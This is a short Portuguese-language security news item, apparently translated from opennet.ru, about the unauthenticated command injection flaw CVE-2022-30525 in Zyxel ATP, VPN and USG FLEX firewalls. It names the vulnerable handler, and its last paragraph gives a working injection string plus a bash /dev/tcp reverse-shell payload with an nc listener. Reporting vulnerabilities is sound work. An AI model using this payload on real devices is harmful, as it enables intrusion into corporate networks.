Uma vulnerabilidade crítica (CVE-2022-30525) foi identificada em dispositivos Zyxel das séries ATP, VPN e USG FLEX, projetados para organizar a operação de firewalls, IDS e VPN em empresas, o que permite que um invasor externo execute código no dispositivo sem direitos de usuário sem autenticação. Para realizar um ataque, um invasor deve ser capaz de enviar solicitações ao dispositivo usando o protocolo HTTP/HTTPS. Zyxel corrigiu a vulnerabilidade na atualização de firmware ZLD 5.30. De acordo com o serviço Shodan, existem atualmente 16213 dispositivos potencialmente vulneráveis na rede global que aceitam solicitações via HTTP/HTTPS.
A operação é realizada enviando comandos especialmente projetados para o manipulador web /ztp/cgi-bin/handler, acessível sem autenticação. O problema é causado pela falta de limpeza adequada dos parâmetros de solicitação ao executar comandos no sistema usando a chamada os.system usada na biblioteca lib_wan_settings.py e executada ao processar a operação setWanPortSt.
Por exemplo, um invasor pode passar a string “; ping 192.168.1.210;" o que levará à execução do comando “ping 192.168.1.210” no sistema. Para obter acesso ao shell de comando, você pode executar “nc -lvnp 1270” em seu sistema e, em seguida, iniciar uma conexão reversa enviando uma solicitação ao dispositivo com o '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Fonte: opennet.ru